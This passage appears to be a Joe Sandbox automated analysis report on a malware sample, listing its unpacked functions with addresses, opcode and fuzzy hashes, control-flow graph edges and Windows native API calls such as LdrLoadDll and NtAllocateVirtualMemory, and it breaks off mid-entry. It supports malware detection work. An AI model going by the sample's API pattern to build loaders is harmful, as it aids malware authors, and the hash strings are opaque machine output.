                                            • Opcode ID: ce735585b3023d6dfb68a191c91debb73d53f4d81da64b9bfcb1c2b10b6c50f9
                                            • Instruction ID: 745eb3f05450c579891509d8f425d3f1f2555e57fdcff50e7bbe5f5739733a6a
                                            • Opcode Fuzzy Hash: ce735585b3023d6dfb68a191c91debb73d53f4d81da64b9bfcb1c2b10b6c50f9
                                            • Instruction Fuzzy Hash: ECF0F9B6204148ABCB04DF99DC90CEB77ADEF8D314B158749FE5D93202C634E8558BA0
                                            Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 227 40acf0-40ad19 call 41cc50 230 40ad1b-40ad1e 227->230 231 40ad1f-40ad2d call 41d070 227->231 234 40ad3d-40ad4e call 41b4a0 231->234 235 40ad2f-40ad3a call 41d2f0 231->235 240 40ad50-40ad64 LdrLoadDll 234->240 241 40ad67-40ad6a 234->241 235->234 240->241
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                            Function 0041A48C Relevance: 1.5, APIs: 1, Instructions: 42nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 242 41a48c-41a48d 243 41a4d6-41a4fd call 41af60 242->243 244 41a48f-41a4b9 call 41af60 NtClose 242->244 244->243
                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: b8ff4bae4c8e2bd49781e096f4db219384d3e0bbddf7d3dc62efdcff8fcdbb2b
                                            • Instruction ID: 4a912bd7cef69b23412329667c7c7fb5ddc7ee147841c2af3048b3f02d115080
                                            • Opcode Fuzzy Hash: b8ff4bae4c8e2bd49781e096f4db219384d3e0bbddf7d3dc62efdcff8fcdbb2b
                                            • Instruction Fuzzy Hash: E8F03CB5600108ABDB14DF98DC81DEB77B9EF88714F14855AFD0D97201D634E9218BA0
                                            Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 250 41a360-41a3b1 call 41af60 NtCreateFile
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                            Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 266 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                            Function 0041A53D Relevance: 1.5, APIs: 1, Instructions: 28memorynativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 269 41a53d-41a556 270 41a55c-41a57d NtAllocateVirtualMemory 269->270 271 41a557 call 41af60 269->271 271->270
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 43b518bbb4c12f68443765ada0e04a3063f2ea4034a93cff4e1a2e94bde262cf
                                            • Instruction ID: ee0f5891d9d372d632102c49d92fdbaa2a79b28d3c1271333aa80f393085cc74
                                            • Opcode Fuzzy Hash: 43b518bbb4c12f68443765ada0e04a3063f2ea4034a93cff4e1a2e94bde262cf
                                            • Instruction Fuzzy Hash: 43F030B1100149ABCB15DF58DC84CA7B7ACFF88224B15C65DF95D97206C634E865CBB0
                                            Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                            Function 01A12BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 92dedd6702eb8ad2caae876ab8f71e3ff27e88b093f6378cee5cf59b4ead6dde
                                            • Instruction ID: e0321f9a72b59e39f9df2f21ec1500eaacf6fb0962d4f700dc14f9a4f36017b4
                                            • Opcode Fuzzy Hash: 92dedd6702eb8ad2caae876ab8f71e3ff27e88b093f6378cee5cf59b4ead6dde
                                            • Instruction Fuzzy Hash: 5E90023120141802D180715C440564A004597D1301F96C015F0025654DCE198B5977A1
                                            Function 01A12B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e02770239fbc6f7bb17d62ecb8f8cbb96d3dc8c0989beec08276896d82ed9807
                                            • Instruction ID: 0109cd53e9de6771bef5c283d7ca1cadf80ea2ed99d54f5f8d2fffd3b84c69fe
                                            • Opcode Fuzzy Hash: e02770239fbc6f7bb17d62ecb8f8cbb96d3dc8c0989beec08276896d82ed9807
                                            • Instruction Fuzzy Hash: 5B900261202410034105715C4415616404A97E0201F56C021F1014590DC92989916225
                                            Function 01A12AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0d72e97ccb07fd19ad8c488303fe99dae00dee62e2d62eb546cea2e8a6a41711
                                            • Instruction ID: 90e6df70d615d200e73efb95b91fc48b5f557ef9505b2199193e9cf564ee93dd
                                            • Opcode Fuzzy Hash: 0d72e97ccb07fd19ad8c488303fe99dae00dee62e2d62eb546cea2e8a6a41711
                                            • Instruction Fuzzy Hash: 07900435311410030105F55C070550700C7D7D5351757C031F1015550CDF35CD715331
                                            Function 01A12DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a407199653be257ee5a08ab953c8aad3dfbc037d1e553fa33781490fe1e1ede4
                                            • Instruction ID: 2d38dc8207e6b41cf4f8522b6d2e72df2cc97a1b7e354c1df3f26eb9e6ec7747
                                            • Opcode Fuzzy Hash: a407199653be257ee5a08ab953c8aad3dfbc037d1e553fa33781490fe1e1ede4
                                            • Instruction Fuzzy Hash: 2A90023120141413D111715C4505707004997D0241F96C412F0424558DDA5A8A52A221
                                            Function 01A12DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f7e01e8e5898797a2ac2b550f421316ffdf81120d38af183e153805c9866dd18
                                            • Instruction ID: 770607b89cb1d8e5cf1e2e9ab25005bd287fc59c147018fa187cabc64564a377
                                            • Opcode Fuzzy Hash: f7e01e8e5898797a2ac2b550f421316ffdf81120d38af183e153805c9866dd18
                                            • Instruction Fuzzy Hash: BE900221242451525545B15C44055074046A7E0241B96C012F1414950CC92A9956D721
                                            Function 01A12D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4746bbf8b64e6b262028aa86bf036786b36fe6f1a0e8198f280b3f29dedaa6e3
                                            • Instruction ID: 826481beae15e9936a3572c672128fd81ae513b99ff6451a9fb86bb23e1aa87b
                                            • Opcode Fuzzy Hash: 4746bbf8b64e6b262028aa86bf036786b36fe6f1a0e8198f280b3f29dedaa6e3
                                            • Instruction Fuzzy Hash: 0A90043130141003D140715C541D7074045F7F1301F57D011F0414554CDD1DCD575333
                                            Function 01A12D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3b7b90f9d917314b54feec6deb1393c39ac5796fe6cee8b544da2d827f794319
                                            • Instruction ID: bc64aa762b1a8d8b5022ce0e3faced874df0ee9d6531e115b91ed1f636a00dbd
                                            • Opcode Fuzzy Hash: 3b7b90f9d917314b54feec6deb1393c39ac5796fe6cee8b544da2d827f794319
                                            • Instruction Fuzzy Hash: 9A90022921341002D180715C540960A004597D1202F96D415F0015558CCD1989695321
                                            Function 01A12CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c7b3c0c98597f21ba9864a60ec2a296f246198718688d9cd141983d4610d57dd
                                            • Instruction ID: aafaebe98ab865f26c8d3560bd1308562121a820fac448a59a9e333e02d131c2
                                            • Opcode Fuzzy Hash: c7b3c0c98597f21ba9864a60ec2a296f246198718688d9cd141983d4610d57dd
                                            • Instruction Fuzzy Hash: 5490023120141402D100759C5409646004597E0301F56D011F5024555ECA6989916231
                                            Function 01A12C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4cc1cd299a201ad809ef8f0ba2df61a53a845c1e909905f17a8b383f3ede7c3b
                                            • Instruction ID: 93c8dca32789ed31492bb142e21830eddf2ccb9c26cb190f3a2a3bb4a3a8e498
                                            • Opcode Fuzzy Hash: 4cc1cd299a201ad809ef8f0ba2df61a53a845c1e909905f17a8b383f3ede7c3b
                                            • Instruction Fuzzy Hash: BA90023120149802D110715C840574A004597D0301F5AC411F4424658DCA9989917221
                                            Function 01A12FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ac77a727269ea9b5a9cca6b511a181ad8eb0e7261587d357bc1796666c61afcc
                                            • Instruction ID: 2416565b4997bdf413c7acc7c098893cf8590a18b319b9fbea730f962c714536
                                            • Opcode Fuzzy Hash: ac77a727269ea9b5a9cca6b511a181ad8eb0e7261587d357bc1796666c61afcc
                                            • Instruction Fuzzy Hash: 08900221601410424140716C88459064045BBE1211B56C121F0998550DC95D89655765
                                            Function 01A12F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 02e1c56ef6d94188c5a6dc2371a96a44d21a4c4329997a6f076f46293a46951f
                                            • Instruction ID: 757211ee72f75a0d3459ea73c1df774060e782728bbab2e826ca1d360f03a45d
                                            • Opcode Fuzzy Hash: 02e1c56ef6d94188c5a6dc2371a96a44d21a4c4329997a6f076f46293a46951f
                                            • Instruction Fuzzy Hash: 1390023120181402D100715C481570B004597D0302F56C011F1164555DCA2989516671
                                            Function 01A12FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 51b97434bdd452f77618d8f5c1486ed7a99534ec7f81aec2a0b719466c6ee218
                                            • Instruction ID: a5e67eb1c5163bba4494b122da34881b852197f6589a49b66b98b2aa4f4f1adf
                                            • Opcode Fuzzy Hash: 51b97434bdd452f77618d8f5c1486ed7a99534ec7f81aec2a0b719466c6ee218
                                            • Instruction Fuzzy Hash: 60900221211C1042D200756C4C15B07004597D0303F56C115F0154554CCD1989615621
                                            Function 01A12F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9cf8e6ef86fd41119ec52dacca1c1d23b5d003aa3f9674becffec5d1c00965b2
                                            • Instruction ID: 6db034e412d4ba899734af5e20761986906b077fd12d1baa48b5918f2eee5dde
                                            • Opcode Fuzzy Hash: 9cf8e6ef86fd41119ec52dacca1c1d23b5d003aa3f9674becffec5d1c00965b2
                                            • Instruction Fuzzy Hash: CF90026134141442D100715C4415B060045D7E1301F56C015F1064554DCA1DCD526226
                                            Function 01A12EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cd111f96f201ad26e3a965c5466cf9a2983aa0d9ef45e3579ebe18e7cb175959
                                            • Instruction ID: 314ee54f617832f774cac92994b0029738a55e78c89a5912a50e2de1e1ef852a
                                            • Opcode Fuzzy Hash: cd111f96f201ad26e3a965c5466cf9a2983aa0d9ef45e3579ebe18e7cb175959
                                            • Instruction Fuzzy Hash: 7590047130141403D140715C44057470045D7D0301F57C011F5074554FCF5DCFD57775
                                            Function 01A12E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cfbc943052fcb55ded9a94633ff6369edd7f9d3cd70e2bb11e35c9869ff8d8e2
                                            • Instruction ID: 3b7d318d5064dfd4efbd1c23aafc8146f9f4f4d48695fd61c6a7b9baec3fa9fd
                                            • Opcode Fuzzy Hash: cfbc943052fcb55ded9a94633ff6369edd7f9d3cd70e2bb11e35c9869ff8d8e2
                                            • Instruction Fuzzy Hash: 3090022160141502D101715C4405616004A97D0241F96C022F1024555ECE298A92A231
                                            Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                            • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                            Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 6EA
                                            • API String ID: 1279760036-1400015478
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                            Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 204 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a480 213->215 216 40838d 213->216 215->216 216->214
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                            • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                            Function 0041A808 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 219 41a808-41a80d 220 41a7c5-41a7e9 219->220 221 41a80f-41a840 call 41af60 219->221 223 41a7ef-41a804 LookupPrivilegeValueW 220->223 224 41a7ea call 41af60 220->224 224->223
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 8af17b9493d57cdf6817ed4c48402646cd994912f2bca3bc6af469a6ed3bd174
                                            • Instruction ID: e4b1b801e236b75688b18323bce5e2f626194fc871ec06281da7c1adbc1ff8fe
                                            • Opcode Fuzzy Hash: 8af17b9493d57cdf6817ed4c48402646cd994912f2bca3bc6af469a6ed3bd174
                                            • Instruction Fuzzy Hash: 3801FCB5200204AFDB10DF55DC89EEB3BA8EF88724F148059FE4D5B282C935A921CBE4
                                            Function 0041A662 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 253 41a662-41a66e 254 41a670-41a68c call 41af60 253->254 255 41a68d-41a6a1 RtlFreeHeap 253->255 254->255
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 52ac85f5c66e6a37d0cf83c067dc6a12ae60633a2f83bf9124616da158250ad0
                                            • Instruction ID: 0bac7ba97fb0955d837b189fb6d2cc797e577d51c83b24d1364ee89792e77b5b
                                            • Opcode Fuzzy Hash: 52ac85f5c66e6a37d0cf83c067dc6a12ae60633a2f83bf9124616da158250ad0
                                            • Instruction Fuzzy Hash: C2F0BE325002086FD724DF94DD84ED7776DEF48314F194158FA0C2B205C630B815CBE0
                                            Function 00408393 Relevance: 1.5, APIs: 1, Instructions: 30threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
